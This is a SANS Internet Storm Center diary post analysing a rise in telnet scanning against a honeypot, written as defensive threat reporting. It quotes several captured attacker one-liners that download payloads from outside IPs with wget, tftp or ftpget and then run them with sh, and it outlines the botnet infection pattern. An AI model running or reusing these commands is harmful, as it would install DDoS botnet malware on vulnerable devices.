Threat Level: green Handler on Duty: Manuel Humberto Santander Pelaez

SANS ISC: Internet Storm Center - SANS Internet Storm Center Internet Storm Center

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Latest Diaries

ISC Stormcast For Tuesday, May 31st 2016

Increase in Port 23 (telnet) scanning

Published: 2016-05-31
Last Updated: 2016-05-31 21:17:49 UTC
by Johannes Ullrich (Version: 1)
2 comment(s)

Update: I extracted a sample pcap. The target IP (honeypot) is replaced with The odd thing about these connections is that they are not only all "blind", but they don't really send a password. Also, according to my version of Wireshark, the telnet traffic is initially malformed. Maybe a telnet exploit? click here for the pcap file 

Some readers noted that over the weekend, port 23 scans were up significantly. I just took a quick look at our honeypot, and don't really see anything significantly different, other then the well known fact that if you run a telnet server with default password, you are probably already compromised.

Typically, a sharp increase in the number of source IPs indicates some type of worm that uses vulnerable systems to scan for more victims after it infects them.

The main target of telnet scans are usually embedded devices. The exploit follows a pretty simple pattern:

  1. brute force password (usually a well known default password)
  2. Download additional malware via ftp/http or tftp (typically multiple binaries for various architectures)
  3. run the malware, which will typically setup a client for a DDoS botnet.

The malware is very ephemeral, with the distribution point often being shut down by the time it scans our honeypot. Here are a couple of results from our honeypot, and a few tricks about how to deal with lots of data in pcap files.

The first question is: Is this traffic spoofed? As a visual check, we compare the before and after distribution by /8 network. The image shows some deviations, but overall the graphs follow each other and there are no huge discrepancies in RFC1918 networks or other obviously spoofed networks.

For the honeypot, I setup traffic captures collection 100MB pcap files with tcpdump (tcpdump -w /tmp/telnet -C100 port 23). On this very busy honeypot (it covers several thousand IPs), it took about 15 minutes to get to 100MB.

Next, lets take a look at telnet payloads with tshark:

tshark -r telnet -n -Y ' && tcp.len>1' -T fields -e | sort | uniq -c | sort -n

Here are some of the top commands:

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93. 186.254.152/; chmod 777; sh; tftp 93. 186.254.152 -c get; chmod 777; sh; tftp -r -g 93. 186.254.152; chmod 777; sh; rm -rf


cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wget http://149 .56.110.173/;sh;busybox tftp -r -g 149 .56.110.173;sh;busybox tftp 149 .56.110.173 -c get;sh;busybox ftpget 149 .56.110.173;sh;exit


cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://192 .227.221.223/; chmod 777; sh; tftp 192 .227.221.223 -c get; chmod 777; sh; tftp -r -g 192 .227.221.223; chmod 777; sh; ftpget -v -u anonymous -p anonymous -P 21 192 .227.221.223; sh; rm -rf; rm -rf *;


cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wget http://208 .67.1.114/;sh;busybox tftp -r -g 208 .67.1.114;sh;busybox tftp 208 .67.1.114 -c get;sh;busybox ftpget 208 .67.1.114;sh;exit


As you can see, they all follow the standard "pattern".

p0f can give us a quick break down of operating systems for the collected traffic. Pretty much all of the hits come from Linux. Out of the about 1 million p0f records, we got less then 200 that indicate an operating system other then Linux.

So in conclusion: Not sure what causes the significant increase, but I doubt that it is anything fundamentally different from what we have seen before. Keep your telnet servers contained (or turned off) and don't use default passwords.

Johannes B. Ullrich, Ph.D.

2 comment(s)
ISC Stormcast For Tuesday, May 31st 2016

If you have more information or corrections regarding our diary, please share.

Recent Diaries

Analysis of a Distributed Denial of Service (DDoS)
2 days ago by Guy (6 comments)

Applied Lessons Learned
3 days ago by Russell (0 comments)

Keeping an Eye on Tor Traffic
5 days ago by Xme (3 comments)

VMWare Security Advisories
6 days ago by Rick (0 comments)

Stop Using "internal" Top Level Domain Names
1 week ago by Dr. J. (3 comments)

View All Diaries →

Latest Discussions

Google serving up malicious websites in Ads
created 1 week ago by Anonymous (0 replies)

HTTP(S) from DMZ to internal network
created 2 weeks ago by Anonymous (0 replies)

ERP software security issues
created 3 weeks ago by AMAS (1 reply)

infocon.txt issue
created 3 weeks ago by Nelson (3 replies)

Issue wit RSS Feed?
created 1 month ago by Matt M. (1 reply)

View All Forums →

Latest News

View All News →

Top Diaries

Critical Cisco ASA IKEv1/v2 Vulnerability. Active Scanning Detected
3 months ago by Dr. J. (24 comments)

Microsoft Patch Tuesday Summary for May 2016
3 weeks ago by Alex Stanford (5 comments)

CVE-2015-7547: Critical Vulnerability in glibc getaddrinfo
3 months ago by Dr. J. (9 comments)

Neutrino exploit kit sends Cerber ransomware
4 weeks ago by Brad (5 comments)

March 2016 Microsoft Patch Tuesday
2 months ago by Alex Stanford (22 comments)